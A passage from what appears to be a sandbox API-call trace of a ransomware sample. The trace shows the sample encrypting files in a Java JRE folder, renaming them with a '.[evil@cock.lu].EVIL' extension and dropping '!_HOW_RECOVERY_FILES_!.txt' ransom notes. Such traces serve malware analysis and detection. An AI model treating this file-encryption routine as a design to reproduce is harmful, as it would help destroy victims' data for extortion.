files\\java\\jre1.8.0_131\\bin\\resource.dll.[evil@cock.lu].evil")) returned 1 [0093.302] ??_V@YAXPEAX@Z () returned 0x1 [0093.305] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\resource.dll", dwFileAttributes=0x0) returned 0 [0093.305] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0093.305] wcsstr (_Str="rmid.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.305] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\rmid.exe") returned 48 [0093.305] wcscmp (_String1="rmid.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0093.305] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="rmid.exe") returned 0x0 [0093.305] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\rmid.exe") returned 0x30 [0093.306] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\rmid.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\rmid.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0093.308] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x3e40, lpOverlapped=0x0) returned 1 [0093.311] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.311] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.311] _errno () returned 0x84b1160840 [0093.311] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.311] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x3e60, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x3e60, lpOverlapped=0x0) returned 1 [0093.311] CloseHandle (hObject=0x1a4) returned 1 [0093.311] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\rmid.exe", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0093.312] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0093.312] __uncaught_exception () returned 0x84b1160800 [0093.312] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0093.312] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\rmid.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\rmid.exe"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\rmid.exe.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\rmid.exe.[evil@cock.lu].evil")) returned 1 [0093.313] ??_V@YAXPEAX@Z () returned 0x1 [0093.316] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\rmid.exe", dwFileAttributes=0x0) returned 0 [0093.316] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0093.317] wcsstr (_Str="rmiregistry.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.317] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\rmiregistry.exe") returned 55 [0093.317] wcscmp (_String1="rmiregistry.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0093.317] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="rmiregistry.exe") returned 0x0 [0093.317] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\rmiregistry.exe") returned 0x37 [0093.317] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\rmiregistry.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\rmiregistry.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0093.319] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x4040, lpOverlapped=0x0) returned 1 [0093.322] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.322] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.322] _errno () returned 0x84b1160840 [0093.322] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.322] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x4060, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x4060, lpOverlapped=0x0) returned 1 [0093.322] CloseHandle (hObject=0x1a4) returned 1 [0093.322] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\rmiregistry.exe", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0093.322] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0093.322] __uncaught_exception () returned 0x84b1160800 [0093.322] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0093.323] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\rmiregistry.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\rmiregistry.exe"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\rmiregistry.exe.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\rmiregistry.exe.[evil@cock.lu].evil")) returned 1 [0093.323] ??_V@YAXPEAX@Z () returned 0x1 [0093.326] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\rmiregistry.exe", dwFileAttributes=0x0) returned 0 [0093.327] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0093.327] wcsstr (_Str="server", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.327] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\server") returned 46 [0093.327] wcscmp (_String1=".", _String2="server") returned -1 [0093.327] wcscmp (_String1="..", _String2="server") returned -1 [0093.327] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\server") returned 0x2e [0093.327] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\server" | out: _Destination="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\server") returned 0x0 [0093.327] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\*") returned="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\*" [0093.327] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd140 [0093.327] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.327] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\.") returned 48 [0093.327] wcscmp (_String1=".", _String2=".") returned 0 [0093.327] FindNextFileW (in: hFindFile=0x84b11dd140, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0093.327] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.327] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\..") returned 49 [0093.327] wcscmp (_String1=".", _String2="..") returned -1 [0093.327] wcscmp (_String1="..", _String2="..") returned 0 [0093.327] FindNextFileW (in: hFindFile=0x84b11dd140, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0093.327] wcsstr (_Str="classes.jsa", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.327] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa") returned 58 [0093.327] wcscmp (_String1="classes.jsa", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0093.327] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="classes.jsa") returned 0x0 [0093.327] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa") returned 0x3a [0093.327] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\server\\classes.jsa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0093.328] GetLastError () returned 0x5 [0093.328] FindNextFileW (in: hFindFile=0x84b11dd140, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0093.328] wcsstr (_Str="jvm.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.328] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\jvm.dll") returned 54 [0093.328] wcscmp (_String1="jvm.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0093.328] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="jvm.dll") returned 0x0 [0093.328] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\jvm.dll") returned 0x36 [0093.328] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\jvm.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\server\\jvm.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0093.330] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x100000, lpOverlapped=0x0) returned 1 [0093.371] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.371] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.371] _errno () returned 0x84b1160840 [0093.373] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.373] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x100020, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x100020, lpOverlapped=0x0) returned 1 [0093.394] CloseHandle (hObject=0x1a8) returned 1 [0093.407] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\jvm.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0093.407] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0093.408] __uncaught_exception () returned 0x84b1160800 [0093.408] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0093.458] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\jvm.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\server\\jvm.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\jvm.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\server\\jvm.dll.[evil@cock.lu].evil")) returned 1 [0093.459] ??_V@YAXPEAX@Z () returned 0x1 [0093.463] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\jvm.dll", dwFileAttributes=0x0) returned 0 [0093.463] FindNextFileW (in: hFindFile=0x84b11dd140, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0093.463] wcsstr (_Str="Xusage.txt", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.463] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\Xusage.txt") returned 57 [0093.463] wcscmp (_String1="Xusage.txt", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0093.463] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Xusage.txt") returned 0x0 [0093.463] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\Xusage.txt") returned 0x39 [0093.463] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\Xusage.txt" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\server\\xusage.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0093.464] GetFileSize (in: hFile=0x1a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x58f [0093.464] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b116e6e0, nNumberOfBytesToRead=0x5a0, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b116e6e0*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x58f, lpOverlapped=0x0) returned 1 [0093.477] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.477] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.477] _errno () returned 0x84b1160840 [0093.477] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.477] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b116e6e0*, nNumberOfBytesToWrite=0x5a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b116e6e0*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5a0, lpOverlapped=0x0) returned 1 [0093.477] CloseHandle (hObject=0x1a8) returned 1 [0093.478] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\Xusage.txt", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0093.478] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0093.478] __uncaught_exception () returned 0x84b1160800 [0093.478] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0093.478] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\Xusage.txt" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\server\\xusage.txt"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\Xusage.txt.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\server\\xusage.txt.[evil@cock.lu].evil")) returned 1 [0093.479] ??_V@YAXPEAX@Z () returned 0x1 [0093.479] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\Xusage.txt", dwFileAttributes=0x0) returned 0 [0093.479] FindNextFileW (in: hFindFile=0x84b11dd140, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0093.479] FindClose (in: hFindFile=0x84b11dd140 | out: hFindFile=0x84b11dd140) returned 1 [0093.479] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\server") returned 0x2e [0093.479] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0093.479] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0093.479] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0093.481] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0093.481] __uncaught_exception () returned 0x84b1160800 [0093.481] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0093.482] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0093.482] wcsstr (_Str="servertool.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.482] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\servertool.exe") returned 54 [0093.482] wcscmp (_String1="servertool.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0093.482] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="servertool.exe") returned 0x0 [0093.482] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\servertool.exe") returned 0x36 [0093.482] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\servertool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\servertool.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0093.485] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x4040, lpOverlapped=0x0) returned 1 [0093.489] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.489] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.489] _errno () returned 0x84b1160840 [0093.489] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.489] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x4060, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x4060, lpOverlapped=0x0) returned 1 [0093.489] CloseHandle (hObject=0x1a4) returned 1 [0093.489] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\servertool.exe", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0093.489] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0093.489] __uncaught_exception () returned 0x84b1160800 [0093.489] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0093.490] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\servertool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\servertool.exe"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\servertool.exe.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\servertool.exe.[evil@cock.lu].evil")) returned 1 [0093.490] ??_V@YAXPEAX@Z () returned 0x1 [0093.494] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\servertool.exe", dwFileAttributes=0x0) returned 0 [0093.495] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0093.495] wcsstr (_Str="splashscreen.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.495] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\splashscreen.dll") returned 56 [0093.495] wcscmp (_String1="splashscreen.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0093.495] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="splashscreen.dll") returned 0x0 [0093.495] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\splashscreen.dll") returned 0x38 [0093.495] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\splashscreen.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\splashscreen.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0093.497] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x33840, lpOverlapped=0x0) returned 1 [0093.595] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.595] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.595] _errno () returned 0x84b1160840 [0093.595] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.595] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x33860, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x33860, lpOverlapped=0x0) returned 1 [0093.596] CloseHandle (hObject=0x1a4) returned 1 [0093.596] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\splashscreen.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0093.598] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0093.598] __uncaught_exception () returned 0x84b1160800 [0093.598] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0093.598] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\splashscreen.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\splashscreen.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\splashscreen.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\splashscreen.dll.[evil@cock.lu].evil")) returned 1 [0093.599] ??_V@YAXPEAX@Z () returned 0x1 [0093.604] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\splashscreen.dll", dwFileAttributes=0x0) returned 0 [0093.605] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0093.605] wcsstr (_Str="ssv.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.605] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\ssv.dll") returned 47 [0093.605] wcscmp (_String1="ssv.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0093.605] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ssv.dll") returned 0x0 [0093.605] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\ssv.dll") returned 0x2f [0093.605] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\ssv.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\ssv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0093.607] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x8b840, lpOverlapped=0x0) returned 1 [0093.757] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.757] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.757] _errno () returned 0x84b1160840 [0093.758] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.758] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x8b860, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x8b860, lpOverlapped=0x0) returned 1 [0093.759] CloseHandle (hObject=0x1a4) returned 1 [0093.759] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\ssv.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0093.760] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0093.760] __uncaught_exception () returned 0x84b1160800 [0093.760] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0093.760] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\ssv.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\ssv.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\ssv.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\ssv.dll.[evil@cock.lu].evil")) returned 1 [0093.761] ??_V@YAXPEAX@Z () returned 0x1 [0093.765] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\ssv.dll", dwFileAttributes=0x0) returned 0 [0093.765] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0093.765] wcsstr (_Str="ssvagent.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.765] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: 